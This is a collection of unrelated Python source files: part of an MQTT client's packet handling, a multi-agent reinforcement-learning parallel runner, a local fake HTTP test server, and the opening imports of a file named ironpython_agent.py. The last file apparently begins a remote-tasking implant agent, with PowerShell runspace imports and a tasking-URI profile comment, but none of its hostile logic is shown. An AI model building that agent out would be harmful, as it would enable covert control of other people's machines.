self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H" + str(len(protocol)) + "sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
self._easy_log(MQTT_LOG_DEBUG, "Sending CONNECT (u{}, p{}, wr{}, wq{}, wf{}, c{}, k{}) client_id={}".format(
(connect_flags & 0x80) >> 7,
(connect_flags & 0x40) >> 6,
(connect_flags & 0x20) >> 5,
(connect_flags & 0x18) >> 3,
(connect_flags & 0x4) >> 2,
(connect_flags & 0x2) >> 1,
keepalive,
self._client_id
))
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending DISCONNECT")
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
# print("_send_subscribe")
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2 + len(t[0]) + 1
command = SUBSCRIBE | (dup << 3) | 0x2 # (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1])) # packet.append(q)
self._easy_log(MQTT_LOG_DEBUG, "Sending SUBSCRIBE (d"+str(dup)+", m"+str(local_mid)+") ["+ ", ".join(map(lambda t: t[0].decode(), topics)) +"]")
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup << 3) | 0x2 # (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
        self._easy_log(MQTT_LOG_DEBUG, "Sending UNSUBSCRIBE (d"+str(dup)+", m"+str(local_mid)+") ["+ ", ".join(map(lambda t: t.decode(), topics)) +"]")
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
with mutex:
# print("_message_retry_check_actual {}".format(len(messages))) #needed
now = time_func()
for m in messages:
if m.timestamp + self._message_retry < now:
# print("m.state ==", m.state)
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
# m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
# m.dup = True
self._send_pubrel(m.mid) #, True)
def _message_retry_check(self):
# print("_message_retry_check") #needed
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
# print("_messages_reconnect_reset_out") #needed
with self._out_message_mutex:
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
# self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
# self._inflight_messages = self._inflight_messages + 1
if self._clean_session:
if m.state != mqtt_ms_publish:
m.dup = True
m.state = mqtt_ms_publish
else:
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
# m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
def _messages_reconnect_reset_in(self):
# print("_messages_reconnect_reset_in") #needed
with self._in_message_mutex:
if self._clean_session:
self._in_messages = []
return
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
def _messages_reconnect_reset(self):
# print("_messages_reconnect_reset") #needed
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
# print("_packet_queue") #needed
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
with self._out_packet_mutex:
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
# print("_p_q _current_out_packet =", self._current_out_packet)
self._current_out_packet_mutex.release()
# print("self._out_packet =", self._out_packet)
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
#try:
# self._sockpairW.send(sockpair_data)
#except socket.error as err:
# if err != EAGAIN:
# raise
if self._thread is None:
if self._in_callback_mutex.acquire(False):
self._in_callback_mutex.release()
return self.loop_write()
return MQTT_ERR_SUCCESS
def _packet_handle(self):
# print("_packet_handle")
cmd = self._in_packet['command'] & 0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
# print("_handle_connack") #needed
# print(self._in_packet)
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if self._protocol == MQTTv311:
if result == CONNACK_REFUSED_PROTOCOL_VERSION:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
elif (result == CONNACK_REFUSED_IDENTIFIER_REJECTED and self._client_id == b''):
self._easy_log(MQTT_LOG_DEBUG, "NOT IMPLEMENTED - Received CONNACK ("+str(flags)+", "+str(result)+"), attempting to use non-empty CID")
# self._client_id = base62(uuid.uuid4().int, padding=22)
# return self.reconnect()
return MQTT_ERR_CONN_REFUSED
if result == 0:
self._state = mqtt_cs_connected
self._reconnect_delay = None
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
if self.on_connect:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
with self._in_callback_mutex:
self.on_connect(self, self._userdata, flags_dict, result)
if result == 0:
rc = 0
print("_out_messages length: " + str(len(self._out_messages)))
# print("_out_messages: " + str(self._out_messages))
print("_out_messages: " + str([ "m"+str(m.mid)+" "+str(m.topic)+" : "+str(m.payload) for m in self._out_messages ]))
with self._out_message_mutex:
for m in self._out_messages:
m.timestamp = time_func()
if m.state == mqtt_ms_queued:
print("1577 mqtt_ms_queued loop_write()")
self.loop_write() # Process outgoing messages that have just been queued up
return MQTT_ERR_SUCCESS
if m.qos == 0:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_puback
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1591 mqtt_ms_wait_for_puback _send_publish()")
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubrec
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1600 mqtt_ms_wait_for_pubrec _send_publish()")
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubcomp
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
print("1608 mqtt_ms_wait_for_pubcomp _send_pubrel()")
rc = self._send_pubrel(m.mid) #y, m.dup)
if rc != 0:
return rc
print("1612 loop_write()")
self.loop_write() # Process outgoing messages that have just been queued up
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
# print("_handle_suback") #needed after _packet_handle
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
if self.on_subscribe:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
self.on_subscribe(self, self._userdata, mid, granted_qos)
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
# print("_handle_publish") #needed after packet_handle
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08) >> 3
message.qos = (header & 0x06) >> 1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if len(topic) == 0:
return MQTT_ERR_PROTOCOL
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError:
print_topic = "TOPIC WITH INVALID UTF-8: " + str(topic)
message.topic = topic
if message.qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(MQTT_LOG_DEBUG, "Received PUBLISH (d"+str(message.dup)+", q"+str(message.qos)+", r"+str(message.retain)+", m"+str(message.mid)+", '"+print_topic+"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time_func()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
with self._in_message_mutex: # .acquire()
self._in_messages.append(message)
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
with self._in_message_mutex: # .acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
message = self._in_messages.pop(i)
self._handle_on_message(message) # self._in_messages[i]
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
with self._out_message_mutex:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return self._send_pubcomp(mid)
# return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages += 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'][:2])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
with self._out_message_mutex:
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time_func()
return self._send_pubrel(mid) #, False)
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
# mid, = struct.unpack("!H", self._in_packet['packet'][:2])
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
if self.on_unsubscribe:
with self._in_callback_mutex:
self.on_unsubscribe(self, self._userdata, mid)
return MQTT_ERR_SUCCESS
def _do_on_disconnect(self, rc, properties=None):
# with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.user_data_set("dc in _do_on_disconnect")
if properties:
self.on_disconnect(self, self._userdata, rc, properties)
else:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
# if not self.suppress_exceptions:
# raise
def _do_on_publish(self, mid):
# with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
# if not self.suppress_exceptions:
# raise
msg = self._out_messages.pop(mid)
# msg.info._set_as_published()
if msg.qos > 0:
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'][:2])
# mid = struct.unpack("!H", self._in_packet['packet'])
# mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
with self._out_message_mutex:
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
if self.on_publish:
with self._in_callback_mutex:
self.on_publish(self, self._userdata, mid)
msg = self._out_messages.pop(i)
if msg.qos > 0:
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
return MQTT_ERR_SUCCESS
# with self._out_message_mutex:
# try:
# if mid in self._out_messages:
# # Only inform the client the message has been sent once.
# if self.on_publish:
# with self._in_callback_mutex:
# self.on_publish(self, self._userdata, mid)
# msg = self._out_messages.pop(mid)
# # msg.info._set_as_published()
# if msg.qos > 0:
# self._inflight_messages -= 1
# if self._max_inflight_messages > 0:
# rc = self._update_inflight()
# if rc != MQTT_ERR_SUCCESS:
# return rc
# return MQTT_ERR_SUCCESS
# except IndexError:
# # Have removed item so i>count.
# # Not really an error.
# print("_handle_pubackcomp IndexError")
# pass
# return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
matched = False
try:
topic = message.topic.decode('utf-8')
except UnicodeDecodeError:
topic = None
if topic is not None:
for t in self._on_message_filtered:
if topic_matches_sub(t[0], topic):
with self._in_callback_mutex:
t[1](self, self._userdata, message)
matched = True
if matched == False and self.on_message:
with self._in_callback_mutex:
self.on_message(self, self._userdata, message)
def _thread_main(self):
self.loop_forever(retry_first_connection=True)
def _reconnect_wait(self):
# See reconnect_delay_set for details
now = time_func()
# with self._reconnect_delay_mutex:
if self._reconnect_delay is None:
self._reconnect_delay = self._reconnect_min_delay
else:
self._reconnect_delay = min(
self._reconnect_delay * 2,
self._reconnect_max_delay,
)
target_time = now + self._reconnect_delay
remaining = target_time - now
while (self._state != mqtt_cs_disconnecting
and not self._thread_terminate
and remaining > 0):
sleep(min(remaining, 1))
remaining = target_time - time_func()
def _create_socket_connection(self):
# addr = (self._host, self._port)
# source = (self._bind_address, 0)
# return socket.create_connection(addr, source_address=source, timeout=self._keepalive)
err = None
responses = None
try:
responses = socket.getaddrinfo(self._host, self._port, 0, socket.SOCK_STREAM)
except OSError as err:
self._easy_log(MQTT_LOG_DEBUG, "_create_socket_connection err: %s", err)
if not responses:
raise socket.error("getaddrinfo returns an empty list")
if not isinstance(responses, list):
raise socket.error("getaddrinfo did not return a list")
for res in responses:
self._easy_log(MQTT_LOG_DEBUG, ">> Connecting {}".format(res))
if len(res) >= 5:
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if self._keepalive:
sock.settimeout(self._keepalive)
if self._bind_address:
sock.bind(self._bind_address)
sock.connect(sa)
# Break explicitly a reference cycle
err = None
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
try:
raise err
finally:
# Break explicitly a reference cycle
err = None
# def create_connection(self, address, timeout=-1, source_address=None):
# """Connect to *address* and return the socket object.
# Convenience function. Connect to *address* (a 2-tuple ``(host,
# port)``) and return the socket object. Passing the optional
# *timeout* parameter will set the timeout on the socket instance
# before attempting to connect. If no *timeout* is supplied, the
# global default timeout setting returned by :func:`getdefaulttimeout`
# is used. If *source_address* is set it must be a tuple of (host, port)
# for the socket to bind as a source address before making the connection.
# A host of '' or port 0 tells the OS to use the default.
# """
# host, port = address
# err = None
# responses = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
# print(responses)
# for res in responses:
# print(">> Connecting {}".format(res))
# if len(res) >= 5:
# af, socktype, proto, canonname, sa = res
# sock = None
# try:
# sock = socket.socket(af, socktype, proto)
# if timeout is not -1:
# sock.settimeout(timeout)
# if source_address:
# sock.bind(source_address)
# sock.connect(sa)
# # Break explicitly a reference cycle
# err = None
# return sock
# except socket.error as _:
# err = _
# if sock is not None:
# sock.close()
# if err is not None:
# try:
# raise err
# finally:
# # Break explicitly a reference cycle
# err = None
# else:
# raise socket.error("getaddrinfo returns an empty list")
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
# Get arguments
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
self.best_performance = 0
self.save_model = False
# Make subprocesses for the envs
        # zip(*...) unpacks the list of (parent, worker) Pipe pairs into two tuples
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
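        # e.g. with batch_size 2, zip(*[(p0, w0), (p1, w1)]) yields the tuples
        # (p0, p1) and (w0, w1); the parent ends stay in this process while the
        # worker ends are handed to the env subprocesses created below.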
# Import the environment indicated by args
env_fn = env_REGISTRY[self.args.env]
        # Create one environment worker process per batch entry
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
            # Start each worker process
p.start()
        # After the worker processes have started,
        # query any one of them for environment information
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
# Set episode limit
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
def setup(self, scheme, groups, preprocess, mac):
# This setup a new batch method
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
# Define multi-agent controller here
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
def get_env_info(self):
# Return environment information
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs by sending in order
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
        # Pre-transition data is the data used for determining an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
# Get initial transition state
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Initial state update
self.batch.update(pre_transition_data, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
# test_mode if true
# Reset environment for all threads first
self.reset()
all_terminated = False
# initial returns
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
        # Indicates whether each env in the batch has terminated
terminated = [False for _ in range(self.batch_size)]
# Collects the thread indexes that are not terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
# Start running here
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
# The 'mac' is a multi-agent controller
# given state information, it will return actions
            # self.t_env is the total number of environment steps taken so far
            # self.t is the step index within the current episode
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
# Return is the summation of reward
episode_returns[idx] += data["reward"]
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
# pre_transition_data: a dictionary, contains key: state, avail_action, and obs
# bs: envs_not_terminated
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
if test_mode and (len(self.test_returns) == n_test_runs):
# Comment by Jing Huang on 11/19/2020
# cur_profit = cur_stats['profit'] / cur_stats['n_episodes']
# print(cur_profit)
# if self.t_env > 1500000:
# # cur_profit = cur_stats['profit'] / cur_stats['n_episodes']
# if cur_profit > self.best_performance:
# self.save_model = True
# self.best_performance = cur_profit
self._log(cur_returns, cur_stats, log_prefix)
elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
self._log(cur_returns, cur_stats, log_prefix)
if hasattr(self.mac.action_selector, "epsilon"):
self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
httpserver.py
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import BaseHTTPServer
import httplib
import json
import logging
import threading
_STOP_EVENT = '/fakeserver/__stop__'
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handlers implements utility functions to help implementing a fake."""
### Public methods
def send_json(self, data):
"""Sends a JSON response."""
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(data, self.wfile)
def send_octet_stream(self, data):
"""Sends a binary response."""
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(data)
def read_body(self):
"""Reads the request body."""
return self.rfile.read(int(self.headers['Content-Length']))
def yield_body(self):
"""Yields the request body as 4kiB chunks."""
size = int(self.headers['Content-Length'])
while size:
chunk = min(4096, size)
yield self.rfile.read(chunk)
size -= chunk
### Overrides from BaseHTTPRequestHandler
def do_OPTIONS(self):
if self.path == _STOP_EVENT:
self.server.parent._stopped = True
self.send_octet_stream('')
def log_message(self, fmt, *args):
logging.info(
'%s - - [%s] %s', self.address_string(), self.log_date_time_string(),
fmt % args)
class Server(object):
"""Server implements a simple HTTP server to implement a fake."""
_HANDLER_CLS = None
def __init__(self):
assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS
self._closed = False
self._stopped = False
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', 0), self._HANDLER_CLS)
self._server.parent = self
self._server.url = self.url = 'http://127.0.0.1:%d' % (
self._server.server_port)
self._thread = threading.Thread(target=self._run, name='httpd')
self._thread.daemon = True
self._thread.start()
logging.info('%s', self.url)
def close(self):
assert not self._closed
self._closed = True
self._send_event(_STOP_EVENT)
self._thread.join()
def _run(self):
while not self._stopped:
self._server.handle_request()
self._server.server_close()
def _send_event(self, path):
conn = httplib.HTTPConnection(
'127.0.0.1:%d' % self._server.server_port, timeout=60)
try:
conn.request('OPTIONS', path)
conn.getresponse()
finally:
conn.close()
|
ironpython_agent.py
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import socket
import math
import stat
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
from System import Environment
import clr, System
clr.AddReference("System.Management.Automation")
from System.Management.Automation import Runspaces
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
